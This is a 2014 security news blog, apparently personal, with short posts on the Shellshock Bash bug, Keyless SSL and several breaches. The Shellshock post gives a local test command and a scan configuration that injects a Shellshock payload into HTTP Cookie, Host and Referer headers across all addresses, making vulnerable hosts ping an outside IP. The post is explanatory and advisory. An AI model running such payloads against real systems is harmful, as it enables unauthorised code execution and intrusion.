2014-09-25

Shellshock Bash bug

Newest contender in the market for being the biggest vulnerability discovered. Introduction to it:


What assets are vulnerable?
Bash shells – in other words all assets running unix/linux Operating Systems. This includes servers, networking devices, firewalls, appliance boxes

Which versions of Bash are affected?
Everything through version 4.3. Which means about 25 years’ worth of versions!!

When was this publicly announced?
On Wed 24th around noon (GMT).
This means all the bad guys out there, have the code to attack since then. The longer we wait to defend ourselves, the more likelihood we will become a victim

Mitigating Controls:
simply to disable any CGI functionality that makes calls to a shell and indeed some are recommending this. In many cases though, that’s going to be a seriously breaking change and at the very least, one that going to require some extensive testing to ensure it doesn’t cause immediate problems  

How to check if my asset is vulnerable?
There’s a very simple test - which is just running this command within your shell:
env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
If you get “busted” echo’d back out and you’ve successfully exploited the bug.

Exploit’s POC?
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74   *
http-header = Host:() { :; }; ping -c 3 209.126.230.74     *  
http-header = Referer:() { :; }; ping -c 3 209.126.230.74  *

*  Essentially asking the vulnerable assets to ping the attacker. This is what a white-hat (non-malicious) attacker would do. A bad-guy would code in something much more sinister

2014-09-23

Keyless SSL

Establishing secure connections without sharing the private keys. I am sure this comes at the cost of losing a bit on security, but the benefits are evident!

2014-09-12

5 Million Gmail Credentials Leaked

Not clear what is the source of this leak. Apparently Gmail says they were not compromised.

Update 20-Sep-14:
Seems like Google wasn't compromised, and majority of the leaked credentials are incorrect. Could be an old dump?!

2014-09-03

Dairy Queen & Home Depot Compormised

Either the hacking activity has increased this year, or maybe the companies are being more honest about public disclosures.

DQ:  A spokesman for Dairy Queen has confirmed that the company recently heard from the U.S. Secret Service about “suspicious activity” related to a strain of card-stealing malware found in hundreds of other retail intrusions.
[update 11-Oct-14] DQ has confirmed the breach at 395 stores

Home Depot:  The latest victim of Russian hackers specializing in point-of-sale (POS) theft appears to be the venerable do-it-yourself store, Home Depot. A large cache of credit- and debit-card information, dubbed ‘American Sanctions,’ has appeared ...

iCloud Bruteforced - Celeb photos leaked

A hacker allegedly breached Apple’s iCloud service and copied the personal photos of at least 100 high-profile stars.
Story Here